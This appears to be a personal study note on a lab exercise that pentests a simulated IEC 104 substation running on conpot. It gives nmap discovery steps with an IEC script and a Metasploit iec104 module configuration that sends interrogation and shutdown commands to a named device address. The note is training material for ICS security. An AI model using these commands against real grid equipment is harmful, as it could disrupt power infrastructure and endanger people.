10-pentesting_an_infrastructure_substation
10-pentesting_an_infrastructure_substation
Nota importada desde Inbox durante consolidacion bulk.
Pentesting an Infrastructure Substation using 104
MOSTLY - the process, methods, and command are similar if not identical to previous section covered. So from here on we will only introduce new material and just mention previously covered materials [p] in Petest Platform.
Red Team Challenge
INSTRUCTION: Perform a Pentest on a infrastructure substation - shutdown IEC104 substation device
Config
Start conpot with conpot -f --template IEC104
Find host and ports
use netdiscover and nmap port scanning
we find port 2404 to be used
NMAP NSE
Search for nmap scripts related to IEC.
find /usr/share/nmap/ -name *iec*.nse to search for nmap IEC scripts. Note that iec is in small letters
we find the iec script called "iec-identify.nse"
sudo nmap 10.1.0.11 -Pn -p 2404 --script iec-identify.nse use the IEC NMAP script
we confirm port 2404 open, and also the IEC ASDU adrress to be 7720
Metasploit
Search for IEC yields IEC104 client and use it.
IEC104 - Interrogation Command (Enumeration)
set the following in msf -> iec104:
- RHOSTS =
- ASDU_ADDRESS = 7720
- COMMAND_TYPE = 100 (This is the interrogation command)
setg VERBOSE true -> to give detailed output
Now type and enter run
Interrogation successful
IEC04 - Shutdown Command
Ammend in msf -> iec104:
- COMMAND_ADDRESS = 3348
- COMMAND_TYPE = 45 (This is the shutdown command)
- COMMAND_VALUE = 0x00
Now type and enter run
Result is IOA: 3348 DIQ: 0x00 -> shows that in command address 3348 there is value of 0x00 which confirms the shutdown command.